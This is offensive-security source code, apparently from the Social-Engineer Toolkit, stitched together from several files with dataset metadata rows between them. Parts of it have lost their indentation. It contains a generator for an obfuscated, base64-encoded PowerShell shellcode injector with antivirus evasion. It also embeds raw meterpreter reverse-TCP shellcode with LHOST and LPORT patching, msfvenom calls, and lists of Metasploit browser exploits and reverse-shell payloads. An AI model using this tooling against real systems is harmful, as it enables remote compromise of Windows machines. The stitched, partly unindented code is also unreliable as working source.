shellcode = metasploit_shellcode(payload, ipaddr, port)
try:
# if not "reverse_http" in payload or not "reverse_https" in payload:
if not "http" in payload:
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
# sub in \x for 0x
shellcode = re.sub("\\\\x", "0x", shellcode)
shellcode = shellcode.replace("\\", "")
# base counter
counter = 0
# count every four characters then trigger floater and write out data
floater = ""
# ultimate string
newdata = ""
for line in shellcode:
floater = floater + line
counter = counter + 1
if counter == 4:
newdata = newdata + floater + ","
floater = ""
counter = 0
# heres our shellcode prepped and ready to go
shellcode = newdata[:-1]
except Exception as e:
print_error("Something went wrong, printing error: " + str(e))
# added random vars before and after to change strings - AV you are
# seriously ridiculous.
var1 = "$" + generate_random_string(2, 2) # $1
var2 = "$" + generate_random_string(2, 2) # $c
var3 = "$" + generate_random_string(2, 2) # $2
var4 = "$" + generate_random_string(2, 2) # $3
var5 = "$" + generate_random_string(2, 2) # $x
var6 = "$" + generate_random_string(2, 2) # $t
var7 = "$" + generate_random_string(2, 2) # $h
var8 = "$" + generate_random_string(2, 2) # $z
var9 = "$" + generate_random_string(2, 2) # $g
var10 = "$" + generate_random_string(2, 2) # $i
var11 = "$" + generate_random_string(2, 2) # $w
# one line shellcode injection with native x86 shellcode
powershell_code = (r"""$1 = '$t = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $t -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;){Start-Sleep 60};';$h = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-ec ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $h"}else{;iex "& powershell $2 $h";}""" % (shellcode))
# run it through a lame var replace
powershell_code = powershell_code.replace("$1", var1).replace("$c", var2).replace(
"$2", var3).replace("$3", var4).replace("$x", var5).replace("$t", var6).replace(
"$h", var7).replace("$z", var8).replace("$g", var9).replace("$i", var10).replace(
"$w", var11)
# unicode and base64 encode and return it
return base64.b64encode(powershell_code.encode('utf_16_le')).decode("ascii")
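# Editor's illustrative sketch (not part of SET's execution flow): the loop
# above rewrites "\x"-escaped shellcode into the comma-separated "0x.." byte
# list the PowerShell injector expects, e.g. r"\xfc\xe8\x90" -> "0xfc,0xe8,0x90".
def _example_shellcode_to_powershell_bytes(sc=r"\xfc\xe8\x90"):
    sc = re.sub(r"\\x", "0x", sc).replace("\\", "")
    return ",".join(sc[i:i + 4] for i in range(0, len(sc), 4))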
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
# generate payload
port = port.replace("LPORT=", "")
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c" % (msf_path, payload, ipaddr, port), stdout=subprocess.PIPE, shell=True)
data = proc.communicate()[0]
data = data.decode('ascii')
# start to format this a bit to get it ready
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls:
data = data.replace(repl, "")
return data
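# Editor's note (illustrative, hypothetical values): for payload
# windows/meterpreter/reverse_https with LHOST 192.168.1.5 and LPORT 443, the
# routine above shells out to roughly:
#   msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.5 LPORT=443 \
#       StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows \
#       --smallest -f c
# and then strips the C-array wrapping down to a bare "\x.."-style string.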
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
# join the ipaddress into hex value spaces still in tact
ipaddr = ' '.join((hex(int(i))[2:] for i in ip))
# We use a default 255.254.253.252 on all shellcode then replace
# 255.254.253.252 --> hex --> ff fe fd fc
# 443 = '0x1bb'
if port != "443":
port = hex(int(port))
# hack job in order to get ports into right format
# if we are only using three numbers then you have to flux in a zero
if len(port) == 5:
port = port.replace("0x", "\\x0")
else:
port = port.replace("0x", "\\x")
# here we break the counters down a bit to get the port into the right
# format
counter = 0
new_port = ""
for a in port:
if counter < 4:
new_port += a
if counter == 4:
new_port += "\\x" + a
counter = 0
counter = counter + 1
# redefine the port in hex here
port = new_port
ipaddr = ipaddr.split(" ")
first = ipaddr[0]
# split these up to make sure its in the right format
if len(first) == 1:
first = "0" + first
second = ipaddr[1]
if len(second) == 1:
second = "0" + second
third = ipaddr[2]
if len(third) == 1:
third = "0" + third
fourth = ipaddr[3]
if len(fourth) == 1:
fourth = "0" + fourth
# put the ipaddress into the right format
ipaddr = "\\x%s\\x%s\\x%s\\x%s" % (first, second, third, fourth)
shellcode = shellcode.replace(r"\xff\xfe\xfd\xfc", ipaddr)
if port != "443":
# getting everything into the right format
if len(port) > 4:
port = "\\x00" + port
# if we are using a low number like 21, 23, etc.
if len(port) == 4:
port = "\\x00\\x00" + port
shellcode = shellcode.replace(r"\x00\x01\xbb", port)
# return shellcode
return shellcode
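# Editor's illustrative sketch (hypothetical values): the canned shellcode used
# below embeds the placeholder host 255.254.253.252 (\xff\xfe\xfd\xfc) and port
# 443 (\x01\xbb); shellcode_replace() swaps in the real LHOST, so for
# 192.168.1.5 the host bytes become \xc0\xa8\x01\x05.
def _example_shellcode_replace():
    stub = r"\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb"
    return shellcode_replace("192.168.1.5", "443", stub)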
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\n Hack the Gibson...and remember...hugs are worth more than handshakes.\n")
sys.exit()
# these are payloads that are callable
def metasploit_shellcode(payload, ipaddr, port):
# if we are using reverse meterpreter tcp
if payload == "windows/meterpreter/reverse_tcp":
shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
# reverse https requires generation through msfvenom
if payload == "windows/meterpreter/reverse_https":
print_status(
"Reverse_HTTPS takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse http requires generation through msfvenom
if payload == "windows/meterpreter/reverse_http":
print_status(
"Reverse_HTTP takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# allports requires generation through msfvenom
if payload == "windows/meterpreter/reverse_tcp_allports":
print_status(
"Reverse TCP Allports takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse tcp needs to be rewritten for shellcode, will do later
if payload == "windows/shell/reverse_tcp":
print_status(
"Reverse Shell takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse meterpreter tcp
if payload == "windows/x64/meterpreter/reverse_tcp":
shellcode = r"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xff\xfe\xfd\xfc\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff\xe7"
return shellcode
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret, AES.MODE_ECB)
aes = EncodeAES(cipher, data)
return str(aes)
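# Editor's illustrative sketch (not called by SET): encryptAES() pads the
# plaintext with '{' up to a multiple of BLOCK_SIZE (32) before AES-ECB
# encryption, so a 5-character value gains 27 padding characters.
def _example_aes_padding(data="hello"):
    BLOCK_SIZE = 32
    PADDING = '{'
    return data + (BLOCK_SIZE - len(data) % BLOCK_SIZE) * PADDING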
# compare ports to make sure its not already in a config file for metasploit
def check_ports(filename, port):
fileopen = open(filename, "r")
data = fileopen.read()
match = re.search("LPORT " + port, data)
if match:
return True
else:
return False
# the main ~./set path for SET
def setdir():
if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set' + '/')
if check_os() == "windows":
return "src/program_junk/"
# set the main directory for SET
userconfigpath = setdir()
# Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license.
# http://brandon.sternefamily.net/files/mit-license.txt
# CIDR Block Converter - 2007
# convert an IP address from its dotted-quad format to its
# 32 binary digit representation
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
outQuads -= 1
return b
# convert a decimal number to binary representation
# if d is specified, left-pad the binary number with 0s to that length
def dec2bin(n, d=None):
s = ""
while n > 0:
if n & 1:
s = "1" + s
else:
s = "0" + s
n >>= 1
if d is not None:
while len(s) < d:
s = "0" + s
if s == "":
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
    # Python string-slicing weirdness:
    # a /32 would make the prefix slice below empty, so if a subnet of 32 was
    # specified simply return the single IP
    if subnet == 32:
        return bin2ip(baseIP)
# for any other size subnet, print a list of IP addresses by concatenating
# the prefix with each of the suffixes in the subnet
else:
ipPrefix = baseIP[:-(32 - subnet)]
breakdown = ''
for i in range(2**(32 - subnet)):
ipaddr = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
ip_check = is_valid_ip(ipaddr)
if ip_check != False:
# return str(ipaddr)
breakdown = breakdown + str(ipaddr) + ","
return breakdown
# input validation routine for the CIDR block specified
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
return False
# extract prefix and subnet size
prefix, subnet = b.split("/")
    # each quad has an appropriate value (0-255)
quads = prefix.split(".")
for q in quads:
if (int(q) < 0) or (int(q) > 255):
# print "Error: quad "+str(q)+" wrong size."
return False
# subnet is an appropriate value (1-32)
if (int(subnet) < 1) or (int(subnet) > 32):
print("Error: subnet " + str(subnet) + " wrong size.")
return False
# passed all checks -> return True
return True
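# Editor's illustrative sketch (hypothetical range): validateCIDRBlock() checks
# the prefix/mask syntax and printCIDR() expands the block into a comma-
# terminated list, e.g. "10.0.0.0/30" -> "10.0.0.0,10.0.0.1,10.0.0.2,10.0.0.3,".
def _example_cidr_expansion(block="10.0.0.0/30"):
    if validateCIDRBlock(block):
        return printCIDR(block)
    return None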
# Queries a remote host on UDP:1434 and returns MSSQL running port
# Written by Larry Spohn (spoonman) @ TrustedSec
def get_sql_port(host):
# Build the socket with a .1 second timeout
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(.2)
# Attempt to query UDP:1434 and return MSSQL running port
try:
sql_port = None
try:
port = 1434
msg = "\x02\x41\x41\x41\x41"
s.sendto(msg, (host, port))
d = s.recvfrom(1024)
sql_port = d[0].split(";")[9]
        # if we hit an exception, UDP 1434 isn't answering (it could be
        # firewalled off), so we fall back to checking 1433 just in case
except:
sql_port = "1433"
pass
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(.2)
s.connect((host, int(sql_port)))
return_host = host + ":" + sql_port
if return_host != ":" + sql_port:
return host + ":" + sql_port
# if port is closed
except:
return None
except Exception as err:
print(err)
pass
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
The function output includes any exception raised. capture returns
a tuple of (function result, standard output, standard error).
"""
stdout, stderr = sys.stdout, sys.stderr
sys.stdout = c1 = io.StringIO()
sys.stderr = c2 = io.StringIO()
result = None
try:
result = func(*args, **kwargs)
except:
traceback.print_exc()
sys.stdout = stdout
sys.stderr = stderr
return (result, c1.getvalue(), c2.getvalue())
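# Editor's illustrative usage sketch: capture() hands back the wrapped
# function's return value plus whatever it wrote to stdout and stderr.
def _example_capture_usage():
    result, out, err = capture(print, "hello from capture()")
    # result is None, out == "hello from capture()\n", err == ""
    return out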
# check to see if we are running backbox linux
def check_backbox():
if os.path.isfile("/etc/issue"):
backbox = open("/etc/issue", "r")
backboxdata = backbox.read()
if "BackBox" in backboxdata:
return "BackBox"
# if we aren't running backbox
else:
return "Non-BackBox"
else:
print("[!] Not running a Debian variant..")
return "Non-BackBox"
# check to see if we are running kali linux
def check_kali():
if os.path.isfile("/etc/apt/sources.list"):
kali = open("/etc/apt/sources.list", "r")
kalidata = kali.read()
if "kali" in kalidata:
return "Kali"
# if we aren't running kali
else:
return "Non-Kali"
else:
print("[!] Not running a Debian variant..")
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
print("""
[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.\n""")
choice1 = raw_input("Enter the number you want to use [1-3]: ")
# use the default
if choice1 == "":
choice1 = "2"
# make our own
if choice1 == "1":
try:
import src.html.unsigned.self_sign
except:
module_reload(src.html.unsigned.self_sign)
# if we need to use the built in applet
if choice1 == "2":
print_status(
"Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(")
# if we want to build our own
if choice1 == "3":
try:
import src.html.unsigned.verified_sign
except:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3, 0):
import importlib
importlib.reload(module)
else:
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(userconfigpath + "site.template").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
line = line.split("=")
return line[1]
# tail a file
def tail(filename):
if os.path.isfile(filename):
file = open(filename, 'r')
st_results = os.stat(filename)
st_size = st_results[6]
file.seek(st_size)
while 1:
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
                print(line, end="")  # line already ends with a newline
else:
print_error("File not found, cannot tail.")
# this will create an obfsucated powershell encoded command string to be
# used through SET
def powershell_encodedcommand(ps_attack):
ran1 = generate_random_string(1, 2)
ran2 = generate_random_string(1, 2)
ran3 = generate_random_string(1, 2)
ran4 = generate_random_string(1, 2)
full_attack = ('powershell -w 1 -C "sv {0} -;sv {1} ec;sv {2} ((gv {3}).value.toString()+(gv {4}).value.toString());powershell (gv {5}).value.toString() \''.format(ran1, ran2, ran3, ran1, ran2, ran3) + ps_attack + '\'"')
return full_attack
# 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() "' % (ran1, ran2, ran3, ran1, ran2, ran3)
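# Editor's illustrative usage sketch (hypothetical one-liner): the wrapper above
# hides the real command behind randomly named PowerShell variables, so each
# call yields a differently obfuscated launcher, e.g.:
#   powershell_encodedcommand("Write-Output 'SET'")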
| 69,263 | Python | .py | 1,616 | 33.243812 | 1,711 | 0.564226 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,842 | update_config.py | CHEGEBB_africana-framework/externals/set/src/core/update_config.py | #!/usr/bin/env python3
import sys
"""
update_config.py:
This module converts the user-editable set.config text file
into a python module file. This allows the user to edit
the configuration with easily understandable values such
as "ON" or "OFF", but yet SET operates with a module from
which variables can be imported and boolean values operated
upon.
"""
import os
from src.core.setcore import print_status, print_info, print_error, return_continue
import datetime
from time import sleep
definepath = os.getcwd()
# TODO
# * integers should not have quotes
# * paths should be double-quoted
# * Booleans should not be quoted
def value_type(value):
""" Determines whether the setting parameter should be quoted. """
return {
'METASPLOIT_PATH': True,
'METASPLOIT_DATABASE': True,
'ENCOUNT': False,
'AUTO_MIGRATE': False,
'CUSTOM_EXE': True,
'BACKDOOR_EXECUTION': False,
'METERPRETER_MULTI_SCRIPT': False,
'LINUX_METERPRETER_MULTI_SCRIPT': False,
'METERPRETER_MULTI_COMMANDS': True,
'LINUX_METERPRETER_MULTI_COMMANDS': True,
'METASPLOIT_IFRAME_PORT': False,
'ETTERCAP': False,
'ETTERCAP_PATH': True,
'ETTERCAP_DSNIFF_INTERFACE': True,
'DSNIFF': False,
'AUTO_DETECT': False,
'SENDMAIL': False,
'EMAIL_PROVIDER': True,
'WEBATTACK_EMAIL': False,
'APACHE_SERVER': False,
'APACHE_DIRECTORY': True,
'WEB_PORT': False,
'JAVA_ID_PARAM': True,
'JAVA_REPEATER': False,
'JAVA_TIME': True,
'WEBATTACK_SSL': False,
'SELF_SIGNED_CERT': False,
'PEM_CLIENT': True,
'PEM_SERVER': True,
'WEBJACKING_TIME': False,
'COMMAND_CENTER_INTERFACE': True,
'COMMAND_CENTER_PORT': False,
'SET_INTERACTIVE_SHELL': False,
'TERMINAL': True,
'DIGITAL_SIGNATURE_STEAL': False,
'UPX_ENCODE': False,
'UPX_PATH': True,
'AUTO_REDIRECT': False,
'HARVESTER_REDIRECT': False,
'HARVESTER_URL': True,
'UNC_EMBED': False,
'ACCESS_POINT_SSID': True,
'AIRBASE_NG_PATH': True,
'DNSSPOOF_PATH': True,
'AP_CHANNEL': False,
'POWERSHELL_INJECTION': False,
'POWERSHELL_VERBOSE': False,
'WEB_PROFILER': False,
'OSX_REVERSE_PORT': False,
'LINUX_REVERSE_PORT': False,
'USER_AGENT_STRING': True,
'SET_SHELL_STAGER': False,
'AUTOMATIC_LISTENER': False,
'METASPLOIT_MODE': False,
'HARVESTER_LOG': True,
'STAGE_ENCODING': False,
'TRACK_EMAIL_ADDRESSES': False,
'WGET_DEEP': True
}.get(value, "ERROR")
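# Editor's illustrative sketch (not used by SET): settings flagged True above
# are emitted into set_config.py as quoted strings, everything else as bare
# Python values, e.g. UPX_PATH="/usr/bin/upx" (hypothetical path) versus
# UPX_ENCODE=False.
def _example_render_setting(setting, value):
    if value_type(setting):
        return '%s="%s"' % (setting, value)
    return "%s=%s" % (setting, value)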
def update_config():
if not os.path.isdir("/etc/setoolkit"):
os.makedirs("/etc/setoolkit")
init_file = open("/etc/setoolkit/set.config", "r")
new_config = open("/etc/setoolkit/set_config.py", "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python3\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set.config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set.config.py generated: """ + timestamp + """ #
# #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()
sleep(1)
sys.path.append("/etc/setoolkit")
from set_config import CONFIG_DATE as verify
print_info("New set.config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
# return_continue()
if __name__ == "__main__":
update_config()
| 5,243 | Python | .py | 137 | 30.620438 | 83 | 0.536044 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,843 | dictionaries.py | CHEGEBB_africana-framework/externals/set/src/core/dictionaries.py | #!/usr/bin/env python3
""" Python lists used for quick conversion of user input
to strings used by the toolkit
"""
def encoder_type(encode):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0': "",
'1': "shikata_ga_nai",
'2': "",
'3': "MULTIENCODE",
'4': "BACKDOOR",
}.get(encode, "ERROR")
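# Editor's illustrative sketch: each dictionary in this module maps a menu
# selection string to its internal value and falls back to "ERROR" for
# anything unexpected.
def _example_encoder_lookup():
    assert encoder_type('1') == "shikata_ga_nai"
    assert encoder_type('99') == "ERROR"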
def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1': "exploit/multi/browser/adobe_flash_hacking_team_uaf",
'2': "exploit/multi/browser/adobe_flash_nellymoser_bof",
'3': "exploit/multi/browser/adobe_flash_shader_drawing_fill",
'4': "exploit/windows/browser/ms14_012_textrange",
'5': "exploit/windows/browser/ms14_012_cmarkup_uaf",
'6': "exploit/windows/browser/ms13_080_cdisplaypointer",
'7': "exploit/windows/browser/ie_setmousecapture_uaf",
'8': "exploit/multi/browser/java_jre17_jmxbean_2",
'9': "exploit/multi/browser/java_jre17_jmxbean",
'10': "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'11': "exploit/windows/browser/ie_cbutton_uaf",
'12': "exploit/multi/browser/java_jre17_exec",
'13': "exploit/windows/browser/ie_execcommand_uaf",
'14': "exploit/multi/browser/java_atomicreferencearray",
'15': "exploit/multi/browser/java_verifier_field_access",
'16': "exploit/windows/browser/ms12_037_same_id",
'17': "exploit/windows/browser/msxml_get_definition_code_exec",
'18': "exploit/windows/browser/adobe_flash_rtmp",
'19': "exploit/windows/browser/adobe_flash_mp4_cprt",
'20': "exploit/windows/browser/ms12_004_midi",
'21': "multi/browser/java_rhino\nset target 1",
'22': "windows/browser/ms11_050_mshtml_cobjectelement",
'23': "windows/browser/adobe_flashplayer_flash10o",
'24': "windows/browser/cisco_anyconnect_exec",
'25': "windows/browser/ms11_003_ie_css_import",
'26': "windows/browser/wmi_admintools",
'27': "windows/browser/ms10_090_ie_css_clip",
'28': "windows/browser/java_codebase_trust",
'29': "windows/browser/java_docbase_bof",
'30': "windows/browser/webdav_dll_hijacker",
'31': "windows/browser/adobe_flashplayer_avm",
'32': "windows/browser/adobe_shockwave_rcsl_corruption",
'33': "windows/browser/adobe_cooltype_sing",
'34': "windows/browser/apple_quicktime_marshaled_punk",
'35': "windows/browser/ms10_042_helpctr_xss_cmd_exec",
'36': "windows/browser/ms10_018_ie_behaviors",
'37': "windows/browser/ms10_002_aurora",
'38': "windows/browser/ms10_018_ie_tabular_activex",
'39': "windows/browser/ms09_002_memory_corruption",
'40': "windows/browser/ms09_072_style_object",
'41': "windows/browser/ie_iscomponentinstalled",
'42': "windows/browser/ms08_078_xml_corruption",
'43': "windows/browser/ie_unsafe_scripting",
'44': "multi/browser/firefox_escape_retval",
'45': "windows/browser/mozilla_mchannel",
'46': "auxiliary/server/browser_autopwn",
}.get(exploit, "ERROR")
# called from gen_payload.py
# uses payload_menu_2
def ms_payload(payload):
"""
Receives the input given by the user from create_payload.py
and create_payloads.py
"""
return {
'1': "windows/shell_reverse_tcp",
'2': "windows/meterpreter/reverse_tcp",
'3': "windows/vncinject/reverse_tcp",
'4': "windows/x64/shell_reverse_tcp",
'5': "windows/x64/meterpreter/reverse_tcp",
'6': "windows/meterpreter/reverse_tcp_allports",
'7': "windows/meterpreter/reverse_https",
'8': "windows/meterpreter/reverse_tcp_dns",
'9': "windows/download_exec",
}.get(payload, "ERROR")
# called from create_payloads.py
def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1': "shellcode/pyinject",
'2': "shellcode/multipyinject",
'3': "set/reverse_shell",
'4': "set/reverse_shell",
'5': "set/reverse_shell",
'6': "shellcode/alphanum",
# '7': "7",
'8': "cmd/multi",
}.get(payload, "ERROR")
def ms_payload_3(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1': "windows/shell_reverse_tcp",
'2': "windows/meterpreter/reverse_tcp",
'3': "windows/vncinject/reverse_tcp",
'4': "windows/x64/shell_reverse_tcp",
'5': "windows/x64/meterpreter/reverse_tcp",
'6': "windows/x64/shell_bind_tcp",
